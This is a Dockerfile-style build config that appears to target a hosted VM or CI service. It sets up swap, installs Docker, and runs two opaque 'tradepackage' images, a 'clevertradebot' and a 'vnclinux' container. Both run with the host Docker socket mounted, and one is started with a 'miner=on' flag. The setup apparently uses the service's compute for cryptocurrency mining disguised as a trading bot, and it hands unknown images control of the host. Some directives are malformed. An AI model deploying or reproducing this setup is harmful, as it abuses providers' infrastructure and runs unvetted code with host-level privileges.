FROM vm/ubuntu:22.04

ENV linux8888=linuxlinux88888888888888888888888888888888888888888888888888888888888888888888888888888888

RUN sudo dd if=/dev/zero of=/swapfile bs=1024 count=4000000

RUN sudo chmod 600 /swapfile

RUN sudo mkswap /swapfile

RUN sudo swapon /swapfile

RUN apt-get update && apt-get install docker.io

RUN echo "nameserver 8.8.8.8" > /etc/resolv.conf

RUN docker pull tradepackage/clevertradebot8888888888

RUN docker pull tradepackage/vnclinux88888888748874

RUN docker run -it --dns="1.1.1.1" -v /var/run/docker.sock:/var/run/docker.sock --shm-size="12000m" -d tradepackage/vnclinux88888888748874 /bin/bash /var/www/html/linux847488748874

RUN docker run -it -d -v /var/run/docker.sock:/var/run/docker.sock --shm-size="32000m" -e apikey="linux8888" -e apisecret="linux8888" -e quantitytarget="even" -e profit="0.001" -e user="virtual" -e closetrades="on" -e sleepstart="60" -e sleep="120" -e miner="on" -e usdt="1" -e start="off" -p 80:8080 tradepackage/clevertradebot8888888888 /bin/bash /start

EXPOSE WEBSITE 80
